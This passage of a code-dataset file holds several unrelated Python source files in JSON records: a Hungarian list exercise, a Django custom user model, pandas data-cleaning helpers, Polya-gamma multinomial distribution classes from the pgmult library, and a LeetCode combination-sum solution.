eredmeny:int = None\n while(eredmeny is None or eredmeny<mini or eredmeny>maxi):\n data:str=input(\"Please enter the number of elements: \")\n if(data.isdigit()):\n eredmeny = int(data)\n if(eredmeny>maxi or eredmeny<mini):\n print(\"The number you entered is outside the allowed range!\")\n else:\n print(\"You did not enter a number!\")\n time.sleep(2)\n os.system(\"cls\")\n\n return eredmeny\n\ndef listaFeltolteseRandomSzamokkal(elem:int)->List[int]:\n eredmeny: List[int] = []\n for i in range(elem): # exactly elem values; the original range(elem + 1) produced one more element than requested\n eredmeny.append(random.randint(-100,100))\n\n return eredmeny\n\n\ndef halmazKiirasa(kiirandoHalmaz:List[int])-> None:\n for item in kiirandoHalmaz:\n print(f\"{item}\", end=\"\\t\")\n\ndef halmazKiirasa2(kiirandoHalmaz:List[int])-> None:\n for item in kiirandoHalmaz:\n print(f\"{item}\", end=\"\\t\")\n\ndef novekvosorrendukiiras(keresesHalmaza:List[int])-> List[int]:\n temp:int = None\n for i in range(0, len(keresesHalmaza), 1):\n for j in range(i + 1, len(keresesHalmaza), 1):\n if(keresesHalmaza[j] < keresesHalmaza[i]):\n temp = keresesHalmaza[i]\n keresesHalmaza[i] = keresesHalmaza[j]\n keresesHalmaza[j] = temp\n return keresesHalmaza\n\ndef osszeadas(keresesHalmaza:List[int])-> int:\n osszeg: int = 0\n for item in keresesHalmaza:\n osszeg+=item\n\n return osszeg \n\n\"\"\"def listaosszefuzes(halmaz1:List[int], halmaz2:List[int])->List[int]:\n eredmeny:List[int]=halmaz1.copy()\n for item in halmaz2:\n eredmeny.append(item)\n\n solution 2\n eredmeny:List[int]=halmaz1.copy()\n eredmeny += halmaz2.copy()\n \n return eredmeny\n\"\"\"\n# main program\nelemszam = szamBeolvasasa(1,5)\nhalmaz1 = listaFeltolteseRandomSzamokkal(elemszam)\nelemszam2 = szamBeolvasasa(5,10)\nhalmaz2 = listaFeltolteseRandomSzamokkal(elemszam2)\nhalmazKiirasa(halmaz1)\nhalmazKiirasa2(halmaz2)\nnovekvosorrend: List[int] = novekvosorrendukiiras(halmaz1+halmaz2)\nprint(f\"\\n The set in ascending order: {novekvosorrend}\")\nosszeg = osszeadas(halmaz1+halmaz2)\nprint(f\"The average of the set: {osszeg/(elemszam+elemszam2)}\")","repo_name":"T0m134/Python","sub_path":"09-Halmazok/Feladat 6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15963373227","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\n# Create your models here.\n\nGENDER_CHOICES = (\n ('M', 'Male'),\n ('F', 'Female'),\n ('NS', 'Not Set'),\n)\n\n'''\n Custom user class for user registrations. 
Add all the desired properties here\n'''\nclass CustomUser(AbstractUser):\n gender = models.CharField(max_length = 2, choices = GENDER_CHOICES, default = GENDER_CHOICES[2][0])\n\n class Meta:\n unique_together = ('email',)\n verbose_name = 'User'\n\n","repo_name":"aakash-cr7/django-registeration","sub_path":"account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74113787047","text":"# Cleaning functions\nimport pandas as pd\nimport numpy as np\nimport time\n\ndef remove_obvious_outliers(_outliers,df):\n summary = {}\n outliers = _outliers['outliers']\n for outlier in outliers:\n col_name = outlier['column']\n summary[col_name] = {'range-drops':0,'category-drops':0}\n\n\n if 'range' in outlier:\n #print('range')\n\n low = outlier['range'][0]\n high = outlier['range'][1]\n sz = len(df)\n #print('colname: ', col_name)\n #print('type: ',type(low))\n\n if isinstance(low, np.datetime64):\n df = df[(pd.to_datetime(df[col_name]) >= low) & (pd.to_datetime(df[col_name]) <= high)] # Series has no .to_datetime(); use pd.to_datetime\n else:\n df = df[(df[col_name] >= low) & (df[col_name] <= high)]\n\n\n summary[col_name]['range-drops'] = sz - len(df)\n\n elif 'categories' in outlier:\n #print('categories')\n #col_name = outlier['column']\n\n _list = outlier['categories']\n sz = len(df)\n df = df[df[col_name].isin(_list)]\n\n summary[col_name]['category-drops'] = sz - len(df)\n\n return df, summary\n\ndef change_types(converts,df):\n summary = {}\n conversions = converts['conversions']\n straight_conversions = [x for x in conversions if not 'categories' in x]\n\n cat_conversions = [x for x in conversions if 'categories' in x]\n t = time.process_time()\n for cv in conversions:\n summary[cv['column']]={'int':False,'float':False,'datetime':False,'categorize':False}\n elapsed_time = time.process_time() - t\n print('E1 time: ', elapsed_time)\n t = time.process_time()\n for cv in straight_conversions:\n col_name = cv['column']\n\n if cv['to'] == 'int':\n df[cv['column']] = df[cv['column']].astype(int)\n summary[col_name]['int'] = True\n if cv['to'] == 'float':\n df[cv['column']] = df[cv['column']].astype(float)\n summary[col_name]['float'] = True\n if cv['to'] == 'datetime':\n df[cv['column']] = pd.to_datetime(df[cv['column']])\n summary[col_name]['datetime'] = True\n\n elapsed_time = time.process_time() - t\n print('E2 time: ', elapsed_time)\n\n t = time.process_time()\n new_cols = {}\n if len(cat_conversions): # ignore if nothing configured\n for index, row in df.iterrows(): # for each row\n for col_name in df.columns: # each column\n for conv in cat_conversions: # each cat config\n cat_col = conv['column']\n for cat in conv['categories']:\n if col_name == cat_col : # config colname == row[col_name]\n cat_value = cat['value']\n cat_cat = cat['category']\n if cat_value == row[col_name]: # conf value == row value\n if not col_name in new_cols:\n\n new_cols[col_name]=[cat_cat]\n summary[col_name]['categorize'] = True\n\n else:\n\n new_cols[col_name].append(cat_cat)\n\n\n\n elapsed_time = time.process_time() - t\n print('E3 time: ', elapsed_time)\n\n # add converted cols back into dataframe\n t = time.process_time()\n for colname in new_cols:\n df = df.drop(colname,1)\n df[colname]=new_cols[colname]\n elapsed_time = time.process_time() - t\n print('E4 time: ', elapsed_time)\n return df, summary\n\ndef get_clean_column_names(actual_col_list):\n '''\n convert each column to lowercase with underscore separation\n\n e.g., ID to id\n 
e.g., County ID to county_id\n e.g., County-ID to county_id\n :param actual_col_list: list of column names\n :return: clean list of column names\n\n {\n 'field-name': {}\n }\n\n '''\n summary_results = {} # summarize what happened\n clean_column_names = []\n for cn in actual_col_list:\n summary_results[cn] = {}\n ncn = cn\n # get rid of some unwanted characters\n summary_results[cn]['blanks'] = False\n if ' ' in cn:\n ncn = cn.replace(' ','_')\n summary_results[cn]['blanks']=True\n\n\n summary_results[cn]['dashes'] = False\n if '-' in cn:\n ncn = cn.replace('-', '_')\n summary_results[cn]['dashes'] = True # original set the never-initialized 'spaces' key here\n # force first char to lower case\n nncn = ncn\n ncn = ''\n prev_upper = True #False\n case = False\n camelcase = False\n for c in nncn:\n if c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n case = True\n if prev_upper:\n ncn += c.lower()\n else:\n ncn += '_' + c.lower()\n camelcase = True\n prev_upper = True\n else:\n ncn += c\n prev_upper = False\n\n summary_results[cn]['case'] = case\n summary_results[cn]['camelcase'] = camelcase\n summary_results[cn]['clean-name']=ncn\n\n clean_column_names.append(ncn)\n\n return clean_column_names, summary_results\n\ndef get_clean_column_names_lean(actual_col_list):\n '''\n convert each column to lowercase with underscore separation\n e.g., ID to id\n e.g., County ID to county_id\n e.g., County-ID to county_id\n :param actual_col_list: list of column names\n :return: clean list of column names\n '''\n clean_column_names = []\n for cn in actual_col_list:\n\n ncn = cn\n # get rid of some unwanted characters\n if ' ' in cn:\n ncn = cn.replace(' ','_')\n if '-' in cn:\n ncn = cn.replace('-', '_')\n # force first char to lower case\n nncn = ncn\n ncn = ''\n prev_upper = True #False\n for c in nncn:\n if c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n if prev_upper:\n ncn += c.lower()\n else:\n ncn += '_' + c.lower()\n prev_upper = True\n else:\n ncn += c\n prev_upper = False\n\n clean_column_names.append(ncn)\n\n return clean_column_names\n\ndef main():\n print('###############################')\n '''\n print('TEST: get_clean_column_names')\n\n col_nms = ['PatientId','AppointmentID','Gender',\n 'ScheduledDay','AppointmentDay','Age',\n 'Neighbourhood','Scholarship','Hipertension',\n 'Diabetes','Alcoholism','Handcap','SMS_received',\n 'No-show']\n # go get clean columns\n actual_cols = get_clean_column_names_lean(col_nms)\n print('actual_cols: ', actual_cols)\n # expected results\n expected_cols = ['patient_id','appointment_id','gender',\n 'scheduled_day','appointment_day','age',\n 'neighbourhood','scholarship','hipertension',\n 'diabetes','alcoholism','handcap','sms_received',\n 'no_show']\n\n assert actual_cols == expected_cols\n\n actual_cols, results = get_clean_column_names(col_nms)\n\n print('results: ',results)\n\n '''\n df_data = pd.DataFrame({\n 'A': ['1','2','3','24','55','6','70'],\n 'B': ['Yes','No','Yes','No','Yea','Nay','Yes'],\n 'C': ['2011-01-01 01:00:00', '2012-01-01 02:00:00', '2013-01-01 03:00:00', '2014-01-01 03:00:00', '2015-01-01 04:00:00', '2016-01-01 05:00:00', '2017-01-01 06:00:00'],\n 'D': [True,False,True,False,True,False,True],\n 'E': [1,2,3,24,55,6,70],\n 'F': ['M','F','M','F','M','F','M']\n }\n )\n\n # age to age category conversion\n yes_no = [\n {'value': 'Yes', 'category': 1},\n {'value': 'No', 'category': 0},\n {'value': 'Yea', 'category': 1},\n {'value': 'Nay', 'category': 0}\n ]\n\n true_false = [\n {'value': True, 'category': 1},\n {'value': False, 'category': 0}\n ]\n\n _converts = {\n 'conversions': [\n {'column': 'C', 'range': 
(pd.to_datetime('2016-01-01'), pd.to_datetime('2017-01-01'))},\n\n {'column': 'A', 'to': 'int'},\n {'column': 'B', 'to': 'int', 'categories':yes_no},\n {'column': 'C', 'to': 'datetime'},\n {'column': 'D', 'to': 'int', 'categories':true_false}\n\n ]\n }\n\n #df,convert_summary = get_type_changes(_converts, df_data)\n\n #print(df.info())\n #print(convert_summary)\n\n print('################ Outliers')\n _outliers = {\n 'outliers': [\n\n {'column':'C','range': (pd.to_datetime('2016-01-01'), pd.to_datetime('2017-01-01'))},\n #{'column': 'A', 'range': (1, 69)},\n #{'column':'F','categories':['M']}\n ]\n }\n df_data['C'] = pd.to_datetime(df_data['C'])\n df_data.info()\n\n remove_obvious_outliers(_outliers, df_data)\n\n #df, outlier_summary = get_with_outliers_removed(_outliers, df)\n #print('outlier_summary: ', outlier_summary)\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()","repo_name":"citizenlabsgr/adopt-a-drain","sub_path":"notebook/lib/p3_clean 2.py","file_name":"p3_clean 2.py","file_ext":"py","file_size_in_byte":9132,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1017499157","text":"\nimport numpy as np\nfrom numpy.linalg import inv, solve\n\nfrom scipy.special import gammaln\nfrom scipy.misc import logsumexp\n\nfrom pybasicbayes.abstractions import Distribution, GibbsSampling, Model\nfrom pybasicbayes.distributions import Multinomial\n\nfrom pgmult.utils import kappa_vec, N_vec, pi_to_psi, psi_to_pi, \\\n ln_psi_to_pi, ln_pi_to_psi, initialize_polya_gamma_samplers, \\\n compute_psi_cmoments\n\nimport pypolyagamma as ppg\n\nclass PGMultinomial(GibbsSampling):\n \"\"\"\n A base class for the Polya-gamma augmented multinomial distribution.\n The parameter of the multinomial distribution, \\pi, is obtained by\n transforming the Gaussian-distributed vector, \\psi. To perform inference\n over \\psi given multinomial observations, we augment the distribution\n with a Polya-gamma distributed vector \\omega. 
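(Added note, hedged: this augmentation rests on the standard Polya-gamma\n identity of Polson, Scott and Windle (2013),\n\n e^{a \\psi} / (1 + e^{\\psi})^b = 2^{-b} e^{\\kappa \\psi} E_{\\omega}[e^{-\\omega \\psi^2 / 2}],\n\n with \\kappa = a - b/2 and \\omega ~ PG(b, 0); conditioning on the sampled\n \\omega leaves a Gaussian-form likelihood in \\psi.) 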
The transformation from\n \\psi to \\pi is given by:\n\n \\pi_1 = \\sigma(\\psi_1)\n \\pi_k = \\sigma(\\psi_k) (1-\\sum_{j < k} \\pi_j) for k = 2..K-1\n \\pi_K = 1-\\sum_{j<K} \\pi_j\n\n where \\sigma is the logistic function mapping reals to [0,1].\n \"\"\"\n\n def __init__(self, K, pi=None, psi=None, mu=None, Sigma=None):\n \"\"\"\n Create a PGMultinomial distribution with mean and covariance for psi.\n\n :param K: Dimensionality of the multinomial distribution\n :param pi: Multinomial probability vector (must sum to 1)\n :param psi: Transformed multinomial probability vector\n :param mu: Mean of \\psi\n :param Sigma: Covariance of \\psi\n \"\"\"\n assert isinstance(K, int) and K >= 2, \"K must be an integer >= 2\"\n self.K = K\n\n if all(param is None for param in (pi,psi,mu,Sigma)):\n mu, sigma = compute_psi_cmoments(np.ones(K))\n Sigma = np.diag(sigma)\n\n if pi is not None:\n if not (isinstance(pi, np.ndarray) and pi.shape == (K,)\n and np.isclose(pi.sum(), 1.0)):\n raise ValueError(\"Pi must be a normalized length-K vector\")\n self.pi = pi\n\n if psi is not None:\n if not (isinstance(psi, np.ndarray) and psi.shape == (K-1,)):\n raise ValueError(\"Psi must be a (K-1) vector of reals\")\n self.psi = psi\n\n if mu is not None and Sigma is not None:\n if not (isinstance(mu, np.ndarray) and mu.shape == (K-1,)):\n raise ValueError(\"Mu must be a (K-1) vector\")\n if not (isinstance(Sigma, np.ndarray) and Sigma.shape == ((K-1), (K-1))):\n raise ValueError(\"Sigma must be a K-1 Covariance matrix\")\n self.mu = mu\n self.Sigma = Sigma\n\n # If psi and pi have not been given, sample from the prior\n if psi is None and pi is None:\n self.psi = np.random.multivariate_normal(self.mu, self.Sigma)\n\n # Initialize Polya-gamma augmentation variables\n self.ppgs = initialize_polya_gamma_samplers()\n self.omega = np.ones(self.K-1)\n\n @property\n def pi(self):\n return psi_to_pi(self.psi)\n\n @pi.setter\n def pi(self, value):\n self.psi = pi_to_psi(value)\n\n def log_likelihood(self, x):\n ll = 0\n ll += gammaln((x+1).sum()) - gammaln(x+1).sum()\n ll += (x * np.log(self.pi)).sum()\n return ll\n\n def rvs(self, size=1, N=1):\n \"\"\"\n Sample from a PG augmented multinomial distribution\n :param size:\n :return:\n \"\"\"\n # assert self.mu is not None and self.Sigma is not None, \"mu and sigma are not specified!\"\n # psis = np.random.multivariate_normal(self.mu, self.Sigma, size=size)\n # pis = np.empty((size, self.K))\n # for i in xrange(size):\n # pis[i,:] = psi_to_pi(psis[i,:])\n # return pis\n\n # Sample from the multinomial distribution\n return np.random.multinomial(N, self.pi, size=size)\n\n def resample(self, x=None):\n if x is None:\n x = np.zeros((0,self.K))\n\n self.resample_omega(x)\n self.resample_psi(x)\n\n def conditional_psi(self, x):\n \"\"\"\n Compute the conditional distribution over psi given observation x and omega\n :param x:\n :return:\n \"\"\"\n assert x.ndim == 2\n Omega = np.diag(self.omega)\n Sigma_cond = inv(Omega + inv(self.Sigma))\n\n # kappa is the mean dot precision, i.e. 
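the natural (information-form) mean parameter of a Gaussian.\n\n # Added, hedged illustration of the stick-breaking map described in the\n # class docstring (numpy-only sketch, not part of the original module):\n #\n # def psi_to_pi_sketch(psi):\n # pi, stick = [], 1.0\n # for p in psi:\n # pi.append(stick / (1.0 + np.exp(-p))) # sigma(psi_k) * leftover mass\n # stick -= pi[-1]\n # return np.array(pi + [stick]) # last entry: 1 - sum of the rest\n\n # As noted above, kappa is the mean dot precision, i.e. 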
the sufficient statistic of a Gaussian\n # therefore we can sum over datapoints\n kappa = kappa_vec(x).sum(0)\n mu_cond = Sigma_cond.dot(kappa +\n solve(self.Sigma, self.mu))\n\n return mu_cond, Sigma_cond\n\n def resample_psi(self, x):\n mu_cond, Sigma_cond = self.conditional_psi(x)\n self.psi = np.random.multivariate_normal(mu_cond, Sigma_cond)\n\n def resample_omega(self, x):\n \"\"\"\n Resample omega from its conditional Polya-gamma distribution\n :return:\n \"\"\"\n assert x.ndim == 2\n N = N_vec(x)\n\n # Sum the N's (i.e. the b's in the denominator)\n NN = N.sum(0).astype(np.float)\n ppg.pgdrawvpar(self.ppgs, NN, self.psi, self.omega)\n\n\nclass PGMultinomialRegression(Distribution):\n \"\"\"\n z ~ Norm(.,.) eg. Latent state of an LDS\n x ~ Mult(N, Cz)\n \"\"\"\n def __init__(self, K, n, C=None, sigma_C=1, mu=None, mu_pi=None):\n \"\"\"\n Create a PGMultinomial distribution with mean and covariance for psi.\n\n :param K: Dimensionality of the multinomial distribution\n :param mu_C: Mean of the matrix normal distribution over C\n \"\"\"\n assert isinstance(K, int) and K >= 2, \"K must be an integer >= 2\"\n self.K = K\n\n assert isinstance(n, int) and n >= 1, \"n must be an integer >= 1\"\n self.n = n\n\n # Initialize emission matrix C\n self.sigma_C = sigma_C\n if C is None:\n self.C = self.sigma_C * np.random.randn(self.K-1, self.n)\n # mu, sigma = compute_psi_cmoments(np.ones(K))\n # self.C = compute_psi_cmoments(np.ones(K))[0][:,None] * np.ones((self.K-1, self.n))\n else:\n assert C.shape == (self.K-1, self.n)\n self.C = C\n\n # Initialize the observation mean (mu)\n if mu is None and mu_pi is None:\n self.mu = np.zeros(self.K-1)\n elif mu is not None:\n assert mu.shape == (self.K-1,)\n self.mu = mu\n else:\n assert mu_pi.shape == (self.K,)\n self.mu = pi_to_psi(mu_pi)\n\n # Initialize Polya-gamma augmentation variables\n self.ppgs = initialize_polya_gamma_samplers()\n\n def augment_data(self, augmented_data):\n \"\"\"\n Augment the data with auxiliary variables\n :param augmented_data:\n :return:\n \"\"\"\n x = augmented_data[\"x\"]\n T, K = x.shape\n assert K == self.K\n\n augmented_data[\"kappa\"] = kappa_vec(x)\n augmented_data[\"omega\"] = np.ones((T,K-1))\n\n self.resample_omega([augmented_data])\n\n return augmented_data\n\n def psi(self, data):\n # TODO: Fix this hack\n if \"z\" in data:\n z = data[\"z\"]\n elif \"states\" in data:\n z = data[\"states\"].stateseq\n else:\n raise Exception(\"Could not find latent states!\")\n\n psi = z.dot(self.C.T) + self.mu[None,:]\n return psi\n\n def pi(self, data):\n psi = self.psi(data)\n # pi = np.array([psi_to_pi(p) for p in psi])\n pi = psi_to_pi(psi)\n return pi\n\n def log_likelihood(self, data):\n x = data[\"x\"]\n pi = self.pi(data)\n pi = np.clip(pi, 1e-16, 1-1e-16)\n\n # Compute the multinomial log likelihood given psi\n assert x.shape == pi.shape\n ll = 0\n ll += gammaln(x.sum(axis=1) + 1).sum() - gammaln(x+1).sum()\n ll += (x * np.log(pi)).sum()\n return ll\n\n def rvs(self, z, N=1, full_output=False):\n \"\"\"\n Sample from a PG augmented multinomial distribution\n :param size:\n :return:\n \"\"\"\n T,D = z.shape\n psis = z.dot(self.C.T) + self.mu[None, :]\n pis = np.zeros((T, self.K))\n xs = np.zeros((T, self.K))\n for t in range(T):\n pis[t,:] = psi_to_pi(psis[t,:])\n xs[t,:] = np.random.multinomial(N, pis[t,:])\n\n if full_output:\n return pis, xs\n else:\n return xs\n\n def resample(self, augmented_data_list):\n self.resample_C(augmented_data_list)\n self.resample_omega(augmented_data_list)\n\n def resample_C(self, 
augmented_data_list):\n \"\"\"\n Resample the observation vectors. Since the emission noise is diagonal,\n we can resample the rows of C independently\n :return:\n \"\"\"\n # Get the prior\n prior_precision = 1./self.sigma_C * np.eye(self.n)\n prior_mean = np.zeros(self.n)\n prior_mean_dot_precision = prior_mean.dot(prior_precision)\n\n # Get the sufficient statistics from the likelihood\n lkhd_precision = np.zeros((self.K-1, self.n, self.n))\n lkhd_mean_dot_precision = np.zeros((self.K-1, self.n))\n\n for data in augmented_data_list:\n # Compute the residual activation from other components\n # TODO: Fix this hack\n if \"z\" in data:\n z = data[\"z\"]\n elif \"states\" in data:\n z = data[\"states\"].stateseq\n else:\n raise Exception(\"Could not find latent states in augmented data!\")\n\n # Get the observed mean and variance\n omega = data[\"omega\"]\n kappa = data[\"kappa\"]\n prec_obs = omega\n mu_obs = kappa / omega - self.mu[None, :]\n mu_dot_prec_obs = omega * mu_obs\n\n # Update the sufficient statistics for each neuron\n for k in range(self.K-1):\n lkhd_precision[k,:,:] += (z * prec_obs[:,k][:,None]).T.dot(z)\n lkhd_mean_dot_precision[k,:] += \\\n (mu_dot_prec_obs[:,k]).T.dot(z)\n\n # Sample each row of C\n for k in range(self.K-1):\n post_prec = prior_precision + lkhd_precision[k,:,:]\n post_cov = np.linalg.inv(post_prec)\n post_mu = (prior_mean_dot_precision +\n lkhd_mean_dot_precision[k,:]).dot(post_cov)\n post_mu = post_mu.ravel()\n\n self.C[k,:] = np.random.multivariate_normal(post_mu, post_cov)\n\n def resample_omega(self, augmented_data_list):\n \"\"\"\n Resample omega from its conditional Polya-gamma distribution\n :return:\n \"\"\"\n K = self.K\n for data in augmented_data_list:\n x = data[\"x\"]\n T = data[\"T\"]\n\n # TODO: Fix this hack\n if \"z\" in data:\n z = data[\"z\"]\n elif \"states\" in data:\n z = data[\"states\"].stateseq\n else:\n raise Exception(\"Could not find latent states in augmented data!\")\n\n psi = z.dot(self.C.T) + self.mu[None, :]\n N = N_vec(x).astype(np.float)\n tmp_omg = np.zeros(N.size)\n ppg.pgdrawvpar(self.ppgs, N.ravel(), psi.ravel(), tmp_omg)\n data[\"omega\"] = tmp_omg.reshape((T, self.K-1))\n\n # Clip out zeros\n data[\"omega\"] = np.clip(data[\"omega\"], 1e-8,np.inf)\n\n def conditional_mean(self, augmented_data):\n \"\"\"\n Compute the conditional mean \\psi given \\omega\n :param augmented_data:\n :return:\n \"\"\"\n cm = augmented_data[\"kappa\"] / augmented_data[\"omega\"]\n cm[~np.isfinite(cm)] = 0\n cm -= self.mu[None,:]\n return cm\n\n def conditional_prec(self, augmented_data, flat=False):\n \"\"\"\n Compute the conditional mean \\psi given \\omega\n :param augmented_data:\n :return:\n \"\"\"\n O = augmented_data[\"omega\"]\n T = augmented_data[\"T\"]\n Km1 = self.K-1\n\n if flat:\n prec = O\n else:\n prec = np.zeros((T, Km1, Km1))\n for t in range(T):\n prec[t,:,:] = np.diag(O[t,:])\n\n return prec\n\n def conditional_cov(self, augmented_data, flat=False):\n # Since the precision is diagonal, we can invert elementwise\n O = augmented_data[\"omega\"]\n T = augmented_data[\"T\"]\n Km1 = self.K-1\n\n if flat:\n cov = 1./O\n else:\n cov = np.zeros((T, Km1, Km1))\n for t in range(T):\n cov[t,:,:] = np.diag(1./O[t,:])\n\n return cov\n\n### Logistic Normal Models\n# For comparison, we implement the logistic normal model, which is\n# also amenable to PG augmentation, but only the conditional marginals\n# are rendered conjugate with a Gaussian prior, not the conditional joint\n# distribution over \\psi_{1:K}.\n\nclass 
PGLogisticNormalMultinomial(GibbsSampling):\n def __init__(self, K, pi=None, psi=None, mu=None, Sigma=None):\n \"\"\"\n Create a PGMultinomial distribution with mean and covariance for psi.\n\n :param K: Dimensionality of the multinomial distribution\n :param pi: Multinomial probability vector (must sum to 1)\n :param psi: Transformed multinomial probability vector\n :param mu: Mean of \\psi\n :param Sigma: Covariance of \\psi\n \"\"\"\n assert isinstance(K, int) and K >= 2, \"K must be an integer >= 2\"\n self.K = K\n\n assert pi is not None or psi is not None or None not in (mu, Sigma), \\\n \"pi, psi, or (mu and Sigma) must be specified\"\n\n if pi is not None:\n assert isinstance(pi, np.ndarray) and \\\n pi.shape == (K,) and \\\n np.allclose(pi.sum(), 1.0), \\\n \"Pi must be a normalized length-K vector\"\n self.pi = pi\n\n if psi is not None:\n assert isinstance(psi, np.ndarray) and \\\n psi.shape == (K-1,), \\\n \"Psi must be a length-K vector of reals\"\n self.psi = psi\n\n if None not in (mu, Sigma):\n assert isinstance(mu, np.ndarray) and mu.shape == (K,), \\\n \"Mu must be a length-K vector\"\n\n assert isinstance(Sigma, np.ndarray) and Sigma.shape == (K,K), \\\n \"Sigma must be a KxK Covariance matrix\"\n self.mu = mu\n self.Sigma = Sigma\n self.Lambda = np.linalg.inv(Sigma)\n\n # If psi and pi have not been given, sample from the prior\n if psi is None and pi is None:\n self.psi = np.random.multivariate_normal(self.mu, self.Sigma)\n\n # Initialize Polya-gamma augmentation variables\n self.ppgs = initialize_polya_gamma_samplers()\n self.omega = np.ones(self.K)\n\n # Initialize the space for the transformed psi variables, rho\n self.rho = np.zeros(self.K)\n\n @property\n def pi(self):\n return ln_psi_to_pi(self.psi)\n\n @pi.setter\n def pi(self, value):\n self.psi = ln_pi_to_psi(value)\n\n def log_likelihood(self, x):\n ll = 0\n ll += gammaln((x+1).sum()) - gammaln(x+1).sum()\n ll += (x * np.log(self.pi)).sum()\n return ll\n\n def rvs(self, size=1, N=1):\n \"\"\"\n Sample from a PG augmented multinomial distribution\n :param size:\n :return:\n \"\"\"\n # Sample from the multinomial distribution\n return np.random.multinomial(N, self.pi, size=size)\n\n def resample(self, x=None):\n if x is None:\n x = np.zeros((0,self.K))\n\n self.resample_omega(x)\n self.resample_psi(x)\n\n def conditional_psi(self, x, k):\n \"\"\"\n Compute the conditional distribution over psi given observation x and omega\n Using the notation from\n :param x:\n :return:\n \"\"\"\n if x.ndim == 1:\n xx = x[None,:]\n else:\n xx = x\n\n Ck = xx[:,k].sum()\n N = xx.sum()\n\n notk = np.ones(self.K, dtype=np.bool)\n notk[k] = False\n\n # Compute zeta = log(\\sum_{j \\neq k} e^{\\psi_j})\n zetak = logsumexp(self.psi[notk])\n\n # Compute rho\n self.rho[k] = self.psi[k] - zetak\n\n # Get the marginal distribution over rho under the prior\n muk_marg = self.mu[k] \\\n - 1./self.Lambda[k,k] * self.Lambda[k,notk].\\\n dot(self.psi[notk] - self.mu[notk])\n sigmak_marg = 1./self.Lambda[k,k]\n\n # Compute the conditional posterior given psi[notk] and omega\n omegak = self.omega[k]\n sigmak_cond = 1./(omegak + 1./sigmak_marg)\n\n # kappa is the mean dot precision, i.e. 
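the Gaussian natural parameter (mean times precision).\n\n # Added, hedged usage sketch (an assumption, not original code): a typical\n # Gibbs loop with this class would look roughly like\n # dist = PGLogisticNormalMultinomial(K=4, mu=np.zeros(4), Sigma=np.eye(4))\n # x = dist.rvs(N=100)\n # for _ in range(50):\n # dist.resample(x) # resample_omega, then resample_psi\n\n # As above, kappa is the mean dot precision, i.e. 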
the sufficient statistic of a Gaussian\n # therefore we can sum over datapoints\n kappa = (Ck - N/2.0).sum()\n muk_cond = sigmak_cond * (kappa + muk_marg / sigmak_marg + omegak*zetak)\n\n return muk_cond, sigmak_cond\n\n def resample_psi(self, x):\n for k in range(self.K):\n mu_cond, sigma_cond = self.conditional_psi(x, k)\n self.psi[k] = np.random.normal(mu_cond, np.sqrt(sigma_cond))\n\n def resample_omega(self, x):\n \"\"\"\n Resample omega from its conditional Polya-gamma distribution\n :return:\n \"\"\"\n assert x.ndim == 2\n N = x.sum()\n\n # Sum the N's (i.e. the b's in the denominator)\n ppg.pgdrawvpar(self.ppgs, N * np.ones(self.K), self.rho, self.omega)\n\n\n\n\n### Competing models\nclass IndependentMultinomialsModel(Model):\n \"\"\"\n Naive model where we assume the data is drawn from a\n set of static multinomial distributions. For example,\n we observe a matrix of NxK counts and assume that each\n row is a sample from a multinomial distribution with\n parameter \\pi_n. To estimate \\pi_n, we use the empirical\n probability under the training data.\n \"\"\"\n def __init__(self, X):\n assert X.ndim == 2 and (X >= 0).all()\n\n self.N, self.K = X.shape\n # Compute the empirical name probabilities for each row\n alpha = 1\n self.pi = (X+alpha).astype(np.float) / (X+alpha).sum(axis=1)[:,None]\n\n self.multinomials = []\n for pi_n in self.pi:\n self.multinomials.append(Multinomial(weights=pi_n, K=self.K))\n\n def add_data(self,data):\n raise NotImplementedError\n\n def generate(self,keep=True,**kwargs):\n raise NotImplementedError\n\n def predictive_log_likelihood(self, X_test):\n assert X_test.shape == (self.N, self.K)\n ll = 0\n ll += gammaln(X_test.sum(axis=1)+1).sum() - gammaln(X_test+1).sum()\n ll += np.nansum(X_test * np.log(self.pi))\n return ll\n","repo_name":"HIPS/pgmult","sub_path":"pgmult/distributions.py","file_name":"distributions.py","file_ext":"py","file_size_in_byte":18659,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"53"} +{"seq_id":"29891179058","text":"class Solution:\n def combinationSum(self, candidates, target: int):\n # def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates.sort()\n len_cand = len(candidates)\n out_list = []\n stack_for_indices = []\n cur_stack = []\n cur_sum = 0\n i = 0\n while i < len_cand or len(cur_stack) > 0:\n if i < len_cand:\n if cur_sum + candidates[i] <= target:\n stack_for_indices.append(i)\n cur_stack.append(candidates[i])\n cur_sum += cur_stack[-1]\n if cur_sum == target:\n # We found a match!\n out_list.append(cur_stack.copy())\n # clean up structures after a match\n cur_top = cur_stack.pop()\n stack_for_indices.pop()\n cur_sum -= cur_top\n i += 1 # advance only after a match; moved inside this branch so that,\n # while the running sum is still short of target, the same candidate\n # can be pushed again (combination sum allows repetition)\n else: # cur_sum + candidates[i] > target:\n if len(cur_stack) >0:\n cur_top = cur_stack.pop()\n i = stack_for_indices.pop() + 1\n cur_sum -= cur_top\n else:\n break\n else:\n i = stack_for_indices.pop() + 1\n cur_top = cur_stack.pop()\n cur_sum -= cur_top\n return out_list\n\ncandidates = [1]\ntarget = 2\noutput = Solution().combinationSum(candidates,target)\nprint(output)\n \n\n\n","repo_name":"Arnon120/leetcode","sub_path":"39. 
